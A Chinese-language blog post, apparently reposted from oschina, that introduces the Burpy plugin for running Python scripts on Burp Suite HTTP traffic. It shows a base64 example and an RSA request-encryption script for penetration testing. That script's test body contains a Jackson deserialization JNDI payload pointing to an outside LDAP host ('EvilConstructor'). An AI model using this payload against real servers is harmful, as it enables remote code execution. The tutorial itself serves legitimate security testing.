打通BurpSuite与Python之间的任督二脉

Burpy是一款能够打通BurpSuite和Python之间任督二脉的插件，从此之后，你可以用你的python任意处理Http包了！

作用

执行指定python脚本，并将处理结果返回给BurpSuite。

功能、UI介绍

这里有个注意事项：要用python2。

在Burpy PY file path:里面指定好你自己的python脚本，点击start server，就可以开心的干活了。

大家注意看这里：

这个地方是一些开关，为了右键菜单更加简洁。点上之后，右键菜单会有变化。

把这些开关都点上，来看一眼右键菜单：

Burpy Main会自动调用我们脚本中的main方法
Burpy Enc会自动调用encrypt方法
依次类推。

Enable Processor和Enable Auto Enc/Dec这两个开关的功能比较特殊，这里分开说一下

打开enable processor之后，在使用Intruder进行暴力破解之类的动作时，如果payload需要进行加密或签名，我们就可以把加密/签名的算法实现到自己有python脚本的processor函数中。

脚本怎么写

在我们自己的脚本中，要新建一个Burpy类，此类在start server的时候会进行初始化。
Burpy类有这样几个函数：main, encrypt, decrypt, sign, processor，作用咱们上面提到了，不再重复

其中，main函数是必须的，因为右键菜单始终会有一个Burpy Main，这个菜单就是调用的main函数。（如果你连Burpy Main也不调用，这个函数也是可以没有的）

其他的函数看需要，可有可无。之所以这样设计是因为，不是每次你都要进行加解密操作，有时候你只需要进行个md5或者base64就行。贴不贴心？

Talk is cheap, show me the code!
下面咱们看几个例子吧！

编码

这是一个base64编码的例子，其实呢，base64功能很多插件都有，burpsuite自己也有，这里只是为了说明一下Burpy的用法。

import base64
class Burpy:
'''
header is list, append as your need
body is string, modify as your need
'''
def main(self, header, body):
return header, body
def encrypt(self, header, body):
body = base64.b64encode(body)
return header, body
def decrypt(self, header, body):
return header, body
def sign(self, header, body):
return header, body
def processor(self, payload):
return payload+"burpyed"

很简单对不对？
Burpy的灵活之处就在这里，它把整个HTTP数据包都发送到脚本进行处理，HTTP头保存在header列表中，body是个字符串，想怎么处理就怎么处理，处理完把header和body返回就搞定。

上面的函数中，我们只用到了encrypt，其实其他函数都可以删掉的

加密

上面的例子太简单了有没有，这个功能很鸡肋，burpsuite中使用ctrl+b快捷键就完成了，还得写个脚本，这不是大晴天打伞——多此一举吗？
先在这说明一下：下面代码是做RSA加密的。在这个项目中，用户名和密码是经过RSA加密之后传给服务器的，服务器会解密，通过其他漏洞拿到源代码，分析之后发现可能存在Jackson反序列化漏洞，于是写了这个脚本来测试。
这个RSA加密中会取当前时间，再取一个6位随机字符，拼接成一个nonce，而公钥可以在浏览器的JS里面找到。如果没有这个插件，想做这件事基本上很难，找到js代码之后还要在浏览器是执行js代码，复制粘贴等等，幸好我们有Burpy，来看下脚本和体验如何吧！

import json
class Burpy:
def main(self, header, body):
body_json = json.loads(body)
username = repr(body_json.get("username"))
body_json["username"] = "_XXXX_ENC_:V1:RSA:XXXX0001:" + self.rsa_enc(username)
body = json.dumps(body_json)
return header, body
def rsa_enc(self,data):
from Crypto.PublicKey import RSA
from base64 import b64decode,b64encode
from Crypto.Cipher import PKCS1_v1_5
import time
import random
t = int(round(time.time() * 1000))
s = ""
for i in range(6):
s += str(random.randint(1,10))
e = str(t) + s
i = dict()
i["text"] = data
i["timestamp"] = t+5
i["nonce"] = e
pubStr = "MIIxxxxxx9hnjsRkHvPUVT91pl9fR9VKn/F/JbwrNlDZQOnd0AXxxxxxxxcP61EVOdEqAdtA1law/6Z9O4c1nHaDBblx3R9Sr7Lxxxxxx0kxoox7LlAInToUqU1ofWNf0FlF+A6kd1wZhil1Iha9NS8z7UfMx92jxh9RtGWFKxxxxxl4UJsQoS7krDN6skb8SLwga4QYUU3ua8GCxxxxxxx"
msg = json.dumps(i)
#msg = "1565246122420" + msg
keyDER = b64decode(pubStr)
keyPub = RSA.importKey(keyDER)
cipher = PKCS1_v1_5.new(keyPub)
ct = cipher.encrypt(msg.encode('utf-8'))
ect = b64encode(ct)
return ect
def sign(self,data):
from Crypto.PublicKey import RSA
from base64 import b64decode,b64encode
from Crypto.Cipher import PKCS1_v1_5
import time
import random
t = int(round(time.time() * 1000))
s = ""
for i in range(6):
s += str(random.randint(1,10))
e = str(t) + s
i = dict()
i["text"] = data
i["timestamp"] = t+5
i["nonce"] = e
pubStr = "xxxxxx722fdwcupvDquRSlfU7TRI6mRPXo9ALHEUYIA2Bnpt0lU8VcP61EVOdEqAdtA1law/6Z9O4c1nHaDBblx3R9Sr7Lw3KJj6P2pRM/eNxxxxx0kxoox7LlAInToUqU1ofWNf0FlF+A6kd1wZhilxxxxxxB"
msg = json.dumps(i)
#msg = "1565246122420" + msg
keyDER = b64decode(pubStr)
keyPub = RSA.importKey(keyDER)
cipher = PKCS1_v1_5.new(keyPub)
ct = cipher.encrypt(msg.encode('utf-8'))
ect = b64encode(ct)
return ect
if __name__ == "__main__":
b = Burpy()
header = []
body = '{"username": {"text": ["org.hibernate.jmx.StatisticsService",{"sessionFactoryJNDIName": "ldap://1.1.1.1:9001/EvilConstructor"}]}, "svcCode": "client:009", "password": "2", "orgCode": "xxxx"}'
header1,body1 = b.main(header, body)
print body1

来体验一把：

来源：oschina

链接：https://my.oschina.net/u/3691309/blog/4486461

标签

javascript

python

Burp Suite

jackson